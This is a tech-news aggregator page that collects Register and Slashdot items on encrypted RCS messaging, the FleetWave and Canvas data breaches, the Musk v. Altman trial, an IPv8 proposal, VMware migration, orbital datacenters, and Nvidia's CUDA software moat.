news aggregator
Apple, Google drag cross-platform texting into the encrypted age
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: Linux fréttir
ZTE and Claro launch next-generation 4K Ultra HD IP STB in Brazil
Partner Content ZTE Corporation and Claro have launched a new 4K Ultra HD IP STB in Brazil, combining stunning visuals, intelligent voice control and rich content, introducing a new generation of 4K Ultra HD set-top box (STB) in Brazil – bringing together stunning Ultra HD visuals, intelligent voice control, fast connectivity, and rich content into one seamless experience. Against the backdrop of the sustained rapid development of Brazil's digital TV and streaming media business, user requirements for video quality, interactive experience, and network performance continue to rise. ZTE together with Claro, officially launched the new-generation 4K Ultra HD IP STB Z4KW6, bringing “Ultra HD + Intelligent Voice + High-Speed Connectivity + Massive Content” comprehensively to Brazilian households and driving a further upgrade of the digital entertainment experience. Built for the next era of digital TV and streaming, it delivers sharper picture quality and effortless hands-free interaction with far-field voice, making everything feel faster, smoother, and more intuitive. With enhanced connectivity, streaming stays smooth – even in peak usage hours of multi-device homes. And with a rich content ecosystem, all entertainment comes together in one place. Designed for simplicity and built for performance, the Z4KW6 sets a new benchmark for home entertainment. This launch marks a new step forward for home entertainment in Brazil – smarter, faster, and more immersive than ever.
Categories: Linux fréttir
FleetWave outage takes another turn. Chevin confirms crooks accessed customer data
A month after Chevin Fleet Solutions declared its FleetWave outage contained and systems restored, the company has now admitted that attackers accessed customer databases and potentially acquired operational and personal data. Chevin confirmed the breach in an email to customers, seen by The Register, marking the first time it has acknowledged that data was accessed during the April incident that knocked parts of web-based software offline across the UK and US. At the time, Chevin said it had pulled parts of its Azure-hosted FleetWave tool offline while outside cybersecurity specialists investigated. Status pages showed a "major outage" across the UK and US, but beyond that, customers got little detail on what had happened or whether any data had been caught up in it. Now it turns out that at least some customer databases were indeed affected by the breach. According to the email, Chevin’s forensic investigation determined that an "unauthorized third-party accessed and potentially acquired certain data" from customer databases backed up on April 3, 2026. The exposed information varies depending on how customers configured FleetWave, but includes operational fleet management data alongside personal information such as names, contact details, and payroll numbers. It’s unclear how many individuals and organizations have been affected. The Register’s asked for comment and a spokesperson told us: "Chevin recently experienced a cybersecurity incident affecting certain systems. We immediately took steps to contain the incident, engaged with law enforcement and external cybersecurity experts, and have since restored impacted services. "Following consultation with external cybersecurity forensic experts, we are confident our systems have been secured. Our customers are our top priority, and we are working directly with those impacted." The company insists that the stolen information does not generally include any of the higher-risk categories under GDPR, such as financial information, payment card details, passport data, or special category data. Chevin also claims in its email to customers that it has taken steps to stop the information from being "published, sold, or misused," and says ongoing dark web monitoring has not identified evidence of the data circulating online. One Chevin customer told The Register their organization was unlikely to have been the intended ransomware target due to its size, suggesting the breach may have been aimed elsewhere. The customer also questioned why Chevin appeared confident enough to restore systems and close out forensic work before later returning with confirmation that data had in fact been accessed. The customer said the mention of payroll numbers came as a surprise because their company does not use FleetWave for payroll data, raising questions about how tailored the notification really was. Chevin is now offering affected customers a one-time download of their SQL database and a spreadsheet summarizing potentially exposed records through a secure portal. In the email, signed by CEO Gary Thompson, Chevin says it is "confident that the incident has been contained" and FleetWave systems are now "safe and secure for customers." ®
Categories: Linux fréttir
Britain pays Starlink millions despite Musk's calls to overthrow UK government
Britain's Ministry of Defence (MoD) has clocked up a £16.6 million ($22.6 million) bill with Starlink over the past four years, despite SpaceX CEO Elon Musk expressing a desire to overthrow the UK government. Data released by the MoD shows that Britain has continued to pay for access to the spaceborne data network, primarily to help support the Ukrainian military in its ongoing battle against the Russian invasion. Not all of the expenditure is accounted for by Ukraine, however. Some goes toward providing British military personnel serving overseas with a vital link home. According to Business Matters, upward of 50,000 Starlink terminals have been sent to Ukraine since the start of the war in 2022. Initially, the cost of helping that nation's frontline communications was borne by Starlink itself, with some grumbling from Musk, who controls the company's parent business, SpaceX. However, a year later the satellite operator clinched an official US government contract covering the Starlink service for Ukraine, which we understand is still funded by the Department of Defense (DoD), although President Trump has not sought congressional approval for any new funding for US military assistance to Ukraine since returning to office. The UK appears to be footing part of the Starlink bill. The MoD acknowledged the figure, with some spending understood to cover terminals gifted to Ukraine, including their purchase and airtime. However, the MoD seems keen to emphasize that Starlink is not being used for any kind of military purposes by British forces. "Starlink technology is not used for military operations and is primarily used by our hardworking personnel to stay connected with their loved ones when they're in areas without regular internet access, for example on a warship," a spokesperson told The Register. "As the public would rightly expect, all spending is rigorously checked to ensure it delivers value for taxpayers' money and spend on Starlink has significantly reduced in the last year." Ukraine uses Starlink for battlefield communications and remote control of drones. The sum is modest in relation to the entire UK defense budget, on track to hit £62.2 billion ($85 billion) for FY 2025/26. It is also likely just covering a small part of the Ukrainian service costs, as Starlink was asking for $400 million per year to cover these at one point. Some Brits may feel uncomfortable paying a man who has openly called for the overthrow of the British government. Earlier this year, Musk publicly mused whether the US should "liberate the people of Britain from their tyrannical government." No, it wasn't on April 1. ®
Categories: Linux fréttir
Microsoft CEO Satya Nadella Testifies In OpenAI Trial
The Musk v. Altman trial entered its third week Monday, with Microsoft CEO Satya Nadella and former OpenAI co-founder and renowned AI researcher Ilya Sutskever taking the stand. Nadella testified that Elon Musk never raised concerns to him that Microsoft's investments in OpenAI violated any special commitments, and said he viewed the partnership as clearly commercial from the start. He also described OpenAI's 2023 board crisis as "amateur city."
Meanwhile, Sutskever testified that he had raised concerns about Sam Altman because he feared OpenAI could be "destroyed." He expressed concerns about Altman's behavior to the board, in part because he said he felt "a great deal of ownership" over the startup. "I simply cared for it, and I didn't want it to be destroyed," Sutskever said. CNBC reports: Nadella said he was "very proud" that Microsoft took the risk to invest in OpenAI when "no one else was willing" to bet on the fledgling lab. Musk, who testified late last month, said Microsoft's $10 billion investment was the key tipping point that made him believe OpenAI was violating its nonprofit mission. He testified that the scale of the investment bothered him, and it prompted him to open a legal investigation into OpenAI. "I was concerned they were really trying to steal the charity," Musk said from the stand.
Nadella said he did not believe Microsoft's investments in OpenAI were donations, and that there was a clear commercial element to their partnership from the outset. He said during the partnership's early years, Microsoft gave OpenAI sharp discounts on computing resources, and Microsoft believed it would reap marketing benefits from doing so. During a separate video deposition that was played on Monday morning, Michael Wetter, a corporate development executive at Microsoft, said the company has recognized approximately $9.5 billion in revenue to date through its partnership with OpenAI as of March 2025.
[...] Nadella said he was "pretty surprised" by the board's decision [to fire Altman in November 2023], and that his priority was to try and figure out how to maintain continuity for Microsoft customers. Immediately after Altman was removed, Nadella said he made an effort to learn more about what happened, adding that he suspected jealousy and poor communication was at play. During conversations with OpenAI board members after the firing, Nadella said he was simply trying to understand the language in the OpenAI's statement about Altman being "not consistently candid" while communicating with the board. That language, Nadella said, "just didn't sort of suffice, because this is the CEO of a company that we are invested in and we're deeply partnered with, and so I felt that they could have explained to me what are the incidents or what is the detail behind it." There must have been instances of jealousy or miscommunication that could have justified pushing out Altman, Nadella said. He wanted more depth from the board members after the remark about candor, but no such information was available, he said. "It was sort of amateur city, as far as I'm concerned," Nadella testified.
[...] Musk testified that he is not entirely against OpenAI having a for-profit unit, but he said it became "the tail wagging the dog." He repeatedly accused Altman and Brockman of enriching themselves from a charity while also reaping the positive associations that come from running a nonprofit. "Microsoft has their own motivations, and that would be different from the motivations of the charity," Musk said from the stand. "All due respect to Microsoft, do you really want Microsoft controlling digital superintelligence?"
During a videotaped deposition shown in court last week, former OpenAI director Tasha McCauley recalled a discussion with Nadella and her fellow board members after the 2023 decision to dismiss Altman as OpenAI's CEO. "To the best of my recollection, Satya wanted to restore things to as they had been," McCauley said. The board members didn't think that was the right move, she said. But as a court witness on Monday, Nadella said he never demanded that the board reinstate Altman as OpenAI CEO. Recap:
Sam Altman Had a Bad Day In Court (Day Eight)
Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven)
Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six)
OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five)
Musk Concludes Testimony At OpenAI Trial (Day Four)
Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three)
Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two)
Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One)
Read more of this story at Slashdot.
Categories: Linux fréttir
Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that makes it necessary to order a cabinet-level project. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, but doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos which is restricted to certain users. Others have all but dismissed Mythos as a marketing stunt. ® .
Categories: Linux fréttir
Veteran network architect proposes IPv8 – to improve IPv4, not leapfrog v6
A veteran network architect named James Thain has drafted a proposal for “Internet Protocol Version 8” (IPv8) and hopes to crowdfund work to create a testbed that will demonstrate his ideas. Thain’s proposal appeared as an Internet Engineering Task Force (IETF) Internet-Draft on April 16th. Like all such documents, it has no official standing – the multistakeholder systems under which the internet is governed allow open participation and this is Thain’s contribution. The draft opens with a bold vision for IPv8, describing it as “a managed network protocol suite that transforms how networks of every scale – from home networks to the global internet – are operated, secured, and monitored.” On the IPv8 website he describes it as “a managed network protocol suite that resolves IPv4 exhaustion, unifies network management, and stays 100 percent backward compatible — no flag day, no forced migration.” The draft protocol is also “a proper subset of IPv8. An IPv8 address with the routing prefix field set to zero is an IPv4 address. No existing device, application, or network requires modification.” In conversation with The Register, Thain said he created the IPv8 draft because existing protocols were developed for the networking problems of the day, and things have now well and truly moved on. He also thinks that few organizations other than hyperscalers and network operators have a good reason to adopt IPv6, because it doesn’t offer major improvements over IPv4 and migrations to the newer protocol seldom produce return on investment. He allows that IPv4 exhaustion means many organizations and network operators do need to consider IPv6 but feels the best course of action is to improve IPv4 so users get a better protocol without the need for upgrades. One improvement in IPv8 expands the IPv4 numberspace by adding what he calls an “area code” based on a network operator autonomous system number (ASN), the unique identifiers assigned to networks by regional internet registries. ASNs effectively function as addresses for a network, to inform routing decisions. IPv8 proposes an address format r.r.r.r.n.n.n.n where the “r” is the ASN address encoded as a 32-bit integer and the “n” is a conventional IPv4 address. This scheme means every ASN holder gets 232 host addresses – 4,294,967,296 addresses apiece. Thain thinks that will suffice for almost every organization, and those who need more probably already operate multiple ASNs. His scheme would see the IPv4 numberspace expand to around 30 trillion (3 x 1013) unique addresses. That’s well short of the 340 undecillion 3.4 x 1038 addresses available under IPv6, but Thain thinks it’s still enough and that users will appreciate not having to migrate away from IPv4. “It doesn’t require a ton of changes to Border Gateway Protocol which already knows how to route multiple protocols,” Thain told us. “So does MPLS.” IPv8 therefore “gives you a roll forward of IPv4, you just need servers to translate the ‘area codes’. The rest of the stack is all well-known,” Thain said. “There is no magic here, it is just an area code plus IPv4 Another IPv8 feature is what Thain calls a “Zone server” that his draft explains “runs every service a network segment requires: address assignment (DHCP8), name resolution (DNS8), time synchronisation (NTP8), telemetry collection (NetLog8), authentication caching (OAuth8), route validation (WHOIS8 resolver), access control enforcement (ACL8), and IPv4/IPv8 translation (XLATE8).” IPv8 has caused a stir in internetworking circles, and some at times bitter criticism. Others have been more nuanced. Silvan Gephart of ISP Openfactory blogged about the draft and said “I like that there is a proposal thinking about the routing table, addressing, management, authentication and operational complexity as one bigger problem.” Some of the criticism levelled at the protocol suggests it’s the work of AI. Thain doesn’t shy away from having used chatbots to work on his draft and told The Register he feels doing so is contemporary practice. He thinks he can prove the nay-sayers wrong by building an IPv8 testbed and has commenced a crowdfunding campaign that aims to raise $100,000 to cover the cost of developing open-source software, research and testing infrastructure, plus demos and documentation. You can find the crowdfunding project here. ®
Categories: Linux fréttir
A Data Center Drained 30 Million Gallons of Water Unnoticed
A Georgia data center developed by QTS used nearly 30 million gallons of water through two unaccounted-for connections before residents complained about low water pressure and the county utility discovered the issue. "All told, the developer, Quality Technology Services, owed nearly $150,000 for using more than 29 million gallons of unaccounted-for water," reports Politico. "That is equivalent to 44 Olympic-size swimming pools and far exceeds the peak limit agreed to during the data center planning process." From the report: The details were revealed in a May 15, 2025 letter from the Fayette County water system to Quality Technology Services, which outlined the retroactive charge of $147,474. The letter did not specify how many months the unpaid bill covered, but when asked about it Wednesday, Vanessa Tigert, the Fayette County water system director, said it was likely about four months. A QTS spokesperson said the timeframe was 9-15 months. Once the data center was notified, it paid all retroactive charges, a QTS spokesperson said in an email, noting the unmetered water consumption occurred while the county converted its system to smart meters.
The Fayette County water system confirmed the data center's meters are now fully integrated and tracked. Tigert, the water system director, blamed the issue on a procedural mix-up. "Fayette County is a suburb, it's mostly residential, and we don't have much commercial meters in our system anyway," she said. "And so we didn't realize our connection point wasn't working." The incident became public last week when a county resident obtained the 2025 letter to QTS through a public records request and posted it on Facebook, prompting outrage from residents concerned about the data center's water consumption. [...]
Tigert, who sent the 2025 letter to QTS, said the utility didn't know about the water hookups because the connection process "got mixed up" as the county transitioned to a cloud-based system while also trying to accommodate an industrial customer. Tigert also said her staff is small and at capacity. "Just like any water system, we don't have enough staff. We can't keep staff," she said. "I've got one person that's doing inspections and plan review, and so he's spread pretty thin." She said it's possible her staff did know about hookups but that she hadn't been able to locate the inspection report. "I may have hit 'send' too soon," she said about the 2025 letter to QTS. While the utility charged the data center a higher construction rate for the unapproved water consumption, Tigert confirmed the utility did not penalize or fine the data center.
For what it's worth, the Blackstone-owned company says its data centers use a closed-loop cooling system that does not consume water for cooling. The reason for last year's high water use, according to QTS, was the temporary construction work such as concrete, dust control, and site preparation.
Once the campus is fully operational, it should only use a small amount of water for things like bathrooms and kitchens. But that point could still be years away, as construction and expansion in Fayetteville may continue for another three to five years.
Read more of this story at Slashdot.
Categories: Linux fréttir
GitLab promises a different kind of layoff as biz pivots toward AI
GitLab has opened the voluntary separation window and hopes an unspecified number of employees will exit the busniess to help it become "the trusted enterprise platform for software creation in the AI era." According to CEO Bill Staples, the company's effort to trim its workforce differs from other AI-related layoffs. "This restructure process is not like others you may be seeing in the news," wrote Staples in a blog post. "Of course AI is changing the way we work and is part of our transformation plan, but this is not an AI optimization or cost cutting exercise." What is it then? Well, according to Staples, GitLab plans to use most of the money it saves by sacking staff to invest in its business. We note that the five fundamental architectural bets at the heart of this business reorientation – agent-specific APIs; reworked CI/CD; a data model for surfacing context; governance; and support for human-owned, agent-assisted, and autonomous workloads – sound like infrastructure investments, the very thing other companies fuel with vacated payroll obligations. But GitLab isn't (so far as we can tell) returning freed funds to investors, initiating a stock buyback, larding executive bonuses, or launching an ill-advised metaverse venture that will consume $80 billion over five years. So maybe that's the difference to which Staples alluded. The other difference Staples cited is his company's plan to have managers chat with employees about staying or going. "Starting today, managers across the company are entering deeper conversations with leadership about how the restructuring principles land inside their teams," he said. "Those conversations will inform the decision of impacted roles." There's no word on the rubric for these retention-or-departure chats. Presumably employees deemed insufficiently enthused about the new direction will be encouraged to exit through the voluntary separation window. Absent that cooperation, defenestration at the hands of managers will likely follow. While Staples has not provided target for the number of desired layoffs – details will be revealed during the company's Q1 FY2027 financial report on June 2nd – he did set a territory footprint goal. "We're reevaluating our operational footprint, and are planning to reduce the number of countries by up to 30 percent where we have small teams," he said. GitLab currently operates in 60 countries. That's a lot of different corporate entities to run, tax laws to master, and offices to rent. The code biz did not immediately respond to a request to clarify how "small teams" is defined. Nor does it disclose its headcount in recent annual reports. According to analytics biz Unify, GitLab has about 1,800 employees, of whom almost 1,500 work outside the US. Another goal of the layoff plan is to reduce GitLab's organizational layers. "We’re flattening our organization because eight layers is too deep for a company our size and management layers are slowing us down," said Staples. GitLab is betting heavily on its Duo Agent Platform (DAP), which entered general availability in January. As recently as its 2025 annual report [PDF], GitLab talked up the possibility of continued hiring. "We intend to grow our international revenue by strategically increasing our investments in international sales and marketing operations, including headcount in the EMEA and APAC regions," the biz said during a more optimistic time. Now, not so much. Beyond other challenges like soft government business, one reason for the AI remake appears to be the company's decision to raise prices back in 2023. In March, during GitLab's Q4 FY2026 [PDF] conference call for investors, Staples admitted that price-sensitive organizations didn't much appreciate having to pay more. "Our 50 percent Premium price increase a few years ago also coincided with rising AI code experimentation and flattish SaaS budgets," he said. "Simultaneously, our upmarket shift reduced technical resources at the lower end of the market. Together, these have slowed Premium growth, particularly among price-sensitive customers which we estimate at roughly 20 percent of our ARR, including the SMB weakness that we have been discussing recently." ®
Categories: Linux fréttir
Red Hat blasts RHEL 10.1 into orbit aboard Voyager's micro datacenter
Red Hat Enterprise Linux 10.1 has powered up on board a datacenter orbiting 250 miles or about 400 km above the earth. That RHEL-powered satellite is Voyager’s LEOcloud Space Edge “micro” datacenter, which launched aboard a SpaceX Falcon 9 rocket and hitched a ride on the International Space Station (ISS) back in September. The system is designed to demonstrate the advantages of processing data gathered directly in orbit, rather than sending info back to a terrestrial conventional datacenter. Voyager boasts the reduction in latency makes the system as much as 30x faster than sending all the data back to Earth. Originally developed by LEOcloud prior to its acquisition by Voyager last year, Space Edge is, as its name suggests, a low-power edge compute platform for orbital data processing. Voyager and Red Hat contend that “as commercial and government organizations increase their reliance on space-based data, the ability to process data in orbit is increasingly critical.” And they certainly wouldn’t be the first to suggest that. Faced with power constraints, SpaceX, Amazon, Google, Nvidia and others have all announced plans to put large clusters of AI datacenters in orbit, with some designs aiming to cram 100kW worth of compute onboard a single satellite. The company hasn’t disclosed the hardware used in Voyager’s Space Edge, stating only that it’s a “space-hardened managed cloud infrastructure.” Hardening is certainly a concern for complex electronics operating outside Earth’s atmosphere, where charged particles and radiation can corrupt data or do permanent damage over time. HPE’s Spacebourne compute platform demonstrated many of these challenges during its first mission aboard the ISS in 2017. Over the course of its mission the system, which was composed of mostly off-the-shelf components, suffered several upsets including a power failure and SSDs that failed at an “alarming rate,” HPE's Mark Fernandez said at the time. We’ve reached out to Voyager for comment on the system and what kind of data its “micro” datacenter will process during its mission. We’ll let you know if we hear anything back. It’s safe to assume Space Edge’s compute capacity is limited compared as promotional images show its systems are little larger than a shoebox - and therefore offer less room for components than servers used on earth. What we do know is that RHEL 10.1, along with Red Hat’s Universal Base Image (UBI), are up and running on the ISS. Specifically, Space Edge is running RHEL in image mode, an immutable build of the OS where changes to the most directories will reset to a known good state upon reboot. This means that any issues related to what they call "configuration drift" can be addressed by turning the machine off and back on again, a feature we’ll sure will be popular among many in the IT crowd. Alongside the base OS, Space Edge is also running Red Hat’s UBI container image under Podman, a container runtime interface (CRI) similar to Docker that is rootless and daemonless by default. RHEL 10.1’s arrival in orbit comes amid renewed interest in space driven by the yearning of every great hyperscaler to boldly go and generate tokens where no one has before. Actually, they have, but not at scale. But that’s exactly what SpaceX, Amazon and others have proposed. In pursuit of unlimited power, the two companies have independently filed to put large constellations of AI satellite compute platforms in sun-synchronous orbit. In February, SpaceX filed an application with the Federal Communications Commission to lob a million space-based datacenters into orbit. Meanwhile, Amazon has proposed a slightly smaller constellation with 51,600 data processing satellites. Of course, these plans do have one small problem left to solve. How will they get those sats into orbit for less than the cost of simply building more terrestrial infrastructure? According to one space datacenter startup, the economics of orbital datacenters won’t be viable until the cost to orbit falls to around $10 per kilogram. As of writing, a rideshare aboard a Falcon 9 runs about $7,000 a kilogram. ®
Categories: Linux fréttir
Securing the Untrusted Agentic Development Layer
Join us to learn how to architect a development environment where your builders and their agents can move fast and securely.
Categories: Linux fréttir
Quit VMware and you’ll emerge with more complex and less capable infrastructure
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Categories: Linux fréttir
Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and Advanced Placement testing for many. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: Linux fréttir
Digg Tries Again, This Time As an AI News Aggregator
Digg is relaunching again, this time as an AI-focused news aggregator rather than the Reddit-style community site it recently abandoned. TechCrunch reports: On Friday evening, the founder previewed a link to the newly redesigned Digg, which now looks nothing like a Reddit clone and more like the news aggregator it once was. This time around, the site is focused on ranking news -- specifically, AI news to start. In an email to beta testers, the company said the site's goal is to "track the most influential voices in a space" and to surface the news that's actually worth "paying attention to." AI is the area it's testing this idea with, but if successful, Digg will expand to include other topics. The email warned that the site was still raw and "buggy," and was designed more to give users a first look than to serve as its public debut.
On the current homepage, Digg showcases four main stories at the top: the most viewed story, a story seeing rising discussion, the fastest-climbing story, and one "In case you missed it" headline. Below that is a ranked list of top stories for the day, complete with engagement metrics like views, comments, likes, and saves. But the twist is that these metrics aren't the ones generated on Digg itself. Instead, Digg is ingesting content from X in real-time to determine what's being discussed, while also performing sentiment analysis, clustering, and signal detection to determine what matters most. [...] The site also ranks the top 1,000 people involved in AI, as well as the top companies and the top politicians focused on AI issues.
Read more of this story at Slashdot.
Categories: Linux fréttir
CUDA Proves Nvidia Is a Software Company
Nvidia's real AI moat isn't "a piece of hardware," writes Wired's Sheon Han. It's CUDA: a mature, deeply optimized software ecosystem that keeps machine-learning workloads tied to Nvidia GPUs. An anonymous reader quotes a report from Wired: What sounds like a chemical compound banned by the FDA may be the one true moat in AI. CUDA technically stands for Compute Unified Device Architecture, but much like laser or scuba, no one bothers to expand the acronym; we just say "KOO-duh." So what is this all-important treasure good for? If forced to give a one-word answer: parallelization. Here's a simple example. Let's say we task a machine with filling out a 9x9 multiplication table. Using a computer with a single core, all 81 operations are executed dutifully one by one. But a GPU with nine cores can assign tasks so that each core takes a different column -- one from 1x1 to 1x9, another from 2x1 to 2x9, and so on -- for a ninefold speed gain. Modern GPUs can be even cleverer. For example, if programmed to recognize commutativity -- 7x9 = 9x7 -- they can avoid duplicate work, reducing 81 operations to 45, nearly halving the workload. When a single training run costs a hundred million dollars, every optimization counts.
Nvidia's GPUs were originally built to render graphics for video games. In the early 2000s, a Stanford PhD student named Ian Buck, who first got into GPUs as a gamer, realized their architecture could be repurposed for general high-performance computing. He created a programming language called Brook, was hired by Nvidia, and, with John Nickolls, led the development of CUDA. If AI ushers in the age of a permanent white-collar underclass and autonomous weapons, just know that it would all be because someone somewhere playing Doom thought a demon's scrotum should jiggle at 60 frames per second. CUDA is not a programming language in itself but a "platform." I use that weasel word because, not unlike how The New York Times is a newspaper that's also a gaming company, CUDA has, over the years, become a nested bundle of software libraries for AI. Each function shaves nanoseconds off single mathematical operations -- added up, they make GPUs, in industry parlance, go brrr.
A modern graphics card is not just a circuit board crammed with chips and memory and fans. It's an elaborate confection of cache hierarchies and specialized units called "tensor cores" and "streaming multiprocessors." In that sense, what chip companies sell is like a professional kitchen, and more cores are akin to more grilling stations. But even a kitchen with 30 grilling stations won't run any faster without a capable head chef deftly assigning tasks -- as CUDA does for GPU cores. To extend the metaphor, hand-tuned CUDA libraries optimized for one matrix operation are the equivalent of kitchen tools designed for a single job and nothing more -- a cherry pitter, a shrimp deveiner -- which are indulgences for home cooks but not if you have 10,000 shrimp guts to yank out. Which brings us back to DeepSeek. Its engineers went below this already deep layer of abstraction to work directly in PTX, a kind of assembly language for Nvidia GPUs. Let's say the task is peeling garlic. An unoptimized GPU would go: "Peel the skin with your fingernails." CUDA can instruct: "Smash the clove with the flat of a knife." PTX lets you dictate every sub-instruction: "Lift the blade 2.35 inches above the cutting board, make it parallel to the clove's equator, and strike downward with your palm at a force of 36.2 newtons." "You can begin to see why CUDA is so valuable to Nvidia -- and so hard for anyone else to touch," writes Han. "Tuning GPU performance is a gnarly problem. You can't just conscript some tender-footed undergrad on Market Street, hand them a Claude Max plan, and expect them to hack GPU kernels. Writing at this level is a grindsome enterprise -- unless you're a cracker-jack programmer at DeepSeek..."
Han goes on to argue that rivals like AMD and Intel offer competitive specs on paper, but their software stacks have struggled with bugs, compatibility issues, and weak adoption. As a result, Nvidia has built an Apple-like moat around AI computing, leaving the industry dependent on its expensive hardware.
Read more of this story at Slashdot.
